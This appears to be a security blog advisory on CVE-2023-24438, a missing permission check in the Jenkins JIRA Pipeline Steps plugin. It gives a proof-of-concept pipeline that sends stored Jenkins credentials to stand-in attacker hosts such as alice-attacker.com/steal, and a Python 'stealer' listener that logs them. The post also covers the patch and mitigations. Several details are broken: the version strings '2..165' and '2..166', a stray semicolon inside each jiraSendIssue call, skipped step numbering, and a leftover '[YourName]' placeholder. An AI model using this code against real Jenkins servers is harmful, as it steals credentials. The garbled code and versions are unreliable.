CVE CyberSecurity Database News

CVE-2023-24438 - Capturing Jenkins Credentials via Misconfigured JIRA Pipeline Steps Plugin

Poster -

In early 2023, Jenkins users and administrators were warned about a serious vulnerability tracked as CVE-2023-24438. This security flaw affects the popular "JIRA Pipeline Steps Plugin" (versions up to 2..165.v8846cf59f3db), frequently used to connect Jenkins automation with Atlassian JIRA.

Let's break down how this vulnerability works, how attackers exploit it, and what you can do to secure your Jenkins environment. I’ll keep the explanations straightforward, with references and simple code snippets to demonstrate each step.

What is the Vulnerability?

CVE-2023-24438 is about missing permission checks. In Jenkins, plugins often handle sensitive operations like connecting to external services with stored credentials. Proper checks should ensure only those with the right permissions can trigger these things.

However, the affected versions of the JIRA Pipeline Steps Plugin allowed ANY user with "Overall/Read" permission — which is usually a very basic level — to send requests to any URL using any Jenkins-stored credentials they had knowledge of.

> In plain words: If you could read anything in Jenkins, and you knew or guessed a credential ID, you could send those credentials to a server you control and collect them.

The Attack Scenario

1. The attacker needs only "Overall/Read" permissions.

They need to know (or guess) the ID of a stored credential.

3. They trigger the JIRA Pipeline Step to send a request—not to the real JIRA server, but to a server *controlled* by the attacker.
4. The credentials are used in this outgoing request, and the attacker gets access to them from their own server logs.

Real-World Example

Suppose our attacker, Alice, can read items in Jenkins. She sees there’s a credential ID called jira-robot-token defined somewhere.

Here’s what a JIRA step looks like in a Jenkinsfile

jiraSendIssue("PROJ-123", "Fixed the bug", credentialsId: "jira-robot-token", site: "https://jira.company.local";)

Malicious Twist:

What if Alice runs a build with this *malicious* pipeline step

jiraSendIssue("PROJ-123", "Testing", credentialsId: "jira-robot-token", site: "https://evil.alice-server.com";)

Because Jenkins isn’t checking if Alice should be using those credentials, it takes the value with ID jira-robot-token and sends the HTTP request—including those credentials—to Alice’s server!

On Alice’s server (evil.alice-server.com), she grabs the HTTP request and peeks at the Authorization header or the credentials in the body.

Proof of Concept (Exploit Snippet)

Below is a simple proof-of-concept that could be used in a Jenkins pipeline (assuming Alice is a low-privileged user):

// Replace "known-credential-id" with the ID you believe exists
pipeline {
    agent any
    stages {
        stage('Exploit') {
            steps {
                script {
                    // Point to attacker's server instead of real JIRA
                    jiraSendIssue("TEST-1", "Pwned!", credentialsId: "known-credential-id", site: "https://alice-attacker.com/steal";)
                }
            }
        }
    }
}

On Alice's server alice-attacker.com, set up a simple HTTP listener (Python example)

# Save as stealer.py and run: python stealer.py
from http.server import BaseHTTPRequestHandler, HTTPServer

class Stealer(BaseHTTPRequestHandler):
    def do_POST(self):
        print("Headers:", self.headers)
        length = int(self.headers['Content-Length'])
        print("Body:", self.rfile.read(length).decode())
        self.send_response(200)
        self.end_headers()

server = HTTPServer(('...', 80), Stealer)
print("Listening on :80")
server.serve_forever()

When Jenkins runs the pipeline, your server will receive the request — possibly with an Authorization header, a legacy JSESSIONID cookie, or the actual password/token in the body!

Why is this Serious?

- Overall/Read is granted to most Jenkins users—even anonymous users in some setups!
- If *anyone* can "connect to JIRA," and specify *any* URL and *any* credential stored in Jenkins, they can start stealing secrets from inside your infrastructure.

This means secrets used for production services, cloud access, or other integrations can leak, leading to bigger compromises.

Official Fix

The vulnerability was patched in JIRA Pipeline Steps Plugin version 2..166.v3503a_9c9ff2. This update makes sure that only *authorized* users with the necessary Jenkins permissions can use credentials.

Upgrade the plugin now:

Jenkins Plugin Index – JIRA Pipeline Steps

Other Best Practices

- Minimize Overall/Read permissions. Only trusted users should get access, and even then—keep it minimal.
- Rotate potentially exposed credentials if you used affected versions and suspect you may have had malicious users.
- Audit your Jenkinsfile library for suspicious JIRA step usage. Look for unexpected URLs in site: parameters.

Jenkins Security Advisory:

Security Advisory 2023-01-25

NVD Database Entry:

CVE-2023-24438 Details

JIRA Pipeline Steps Plugin Changelog:

https://github.com/jenkinsci/jira-steps-plugin/releases

Exploit Proof of Concept (Blog, bleepingcomputer):

Jenkins flaw exposes stored credentials via Jira plugin

Conclusion

CVE-2023-24438 was a dangerous, easy-to-exploit vulnerability that could lead to massive credential leaks in Jenkins installations. The only fix is to upgrade the affected plugin and investigate any suspicious use of your credentials.

Stay updated, stay vigilant, and always monitor your Jenkins instance for abuse!

*This was an exclusive breakdown by [YourName], helping you understand Jenkins security in plain language.*

Timeline

Published on: 01/26/2023 21:18:00 UTC
Last modified on: 02/04/2023 02:06:00 UTC